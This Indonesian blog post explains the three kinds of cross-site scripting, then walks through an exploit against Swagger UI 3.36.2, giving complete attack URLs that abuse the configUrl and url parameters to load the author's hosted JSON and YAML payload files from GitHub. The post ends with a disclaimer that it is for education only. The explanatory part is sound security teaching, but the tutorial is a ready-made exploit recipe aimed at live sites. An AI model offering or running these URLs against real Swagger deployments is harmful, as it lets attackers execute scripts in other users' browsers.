Hello welcome back to my blog, disini saya akan membagikan tutorial XSS (Cross Site Scripting) pada API yang menggunakan Swagger UI.
sebelum menuju tutorialnya saya akan membahas sedikit apa itu XSS, Jenis serangan XSS dan dampak serangannya.
APA ITU XSS ?
XSS (Cross Site Scripting) adalah eksploitasi keamanan di mana penyerang menempatkan malicious client-end code ke laman web. Selain itu Peretas akan mengeksekusi script berbahaya di browser korban dengan cara memasukkan kode berbahaya ke halaman web atau web aplikasi yang sah. Serangan ini dapat dilakukan menggunakan JavaScript, VBScript, ActiveX, Flash, dan bahasa sisi klien lainnya.
MACAM-MACAM JENIS SERANGAN XSS ?
Serangan XSS memiliki beberapa jenis serangan yaitu diantaranya adalah:
- STORED XSS
Stored XSS merupakan jenis XSS yang paling merusak. Dalam stored XSS, script jahat yang disuntikkan akan disimpan secara permanen di server target, seperti database, forum pesan, visitor log, dan lain-lain. - REFLECTED XSS
Reflected XSS terjadi ketika skrip berbahaya dipantulkan dari web aplikasi ke browser korban. - DOM-BASED XSS
Serangan ini terjadi jika web aplikasi menulis data ke Document Object Model (DOM) tanpa sanitization yang tepat. Penyerang dapat memanipulasi data ini untuk memasukkan konten XSS pada halaman web seperti kode Javascript yang berbahaya.
Nah selanjutnya sayakan membagikan tutorial XSS pada API Swagger UI.
Pertama kalian siapkan code xss yang sudah diupload pada github dengan tipe extensi .json dan .yaml atau kalian bisa menggunakan script yang telah saya sediakan.
1. Akses URL API Swagger UI Index.html
Contoh URL: https://Redacted.com/swagger-ui/3.36.2/index.html?
2. Kemudian tambahkan exploit code script XSS pada URL target.
note: "disini saya sudah menyiapkan code XSS meggunakan github saya"
Bahan Exploit:
Start Exploit:
https://REDACTED.com/swagger-ui/3.36.2/index.html?configUrl=https://raw.githubusercontent.com/rizqimaulanaa/XSS-Swagger-UI/main/xss.json
https://REDACTED.com/swagger-ui/3.36.2/index.html?url=https://raw.githubusercontent.com/rizqimaulanaa/XSS-Swagger-UI/main/xss.yaml
Nanti jika tereksekusi akan menampilkan popup xss pada halaman target.
Mungkin sampai sini saja tutorial yang bisa saya berikan mohon untuk tidak menyerang, materi ini diberikan untuk edukasi. mimin tidak bertanggung jawab atas apa yang dilakukan penyerang sekian dan terima kasih.
Post a Comment
Jangan Lupa Untuk Terus Visit blog kami : https://mrwho-404.blogspot.com/?m=1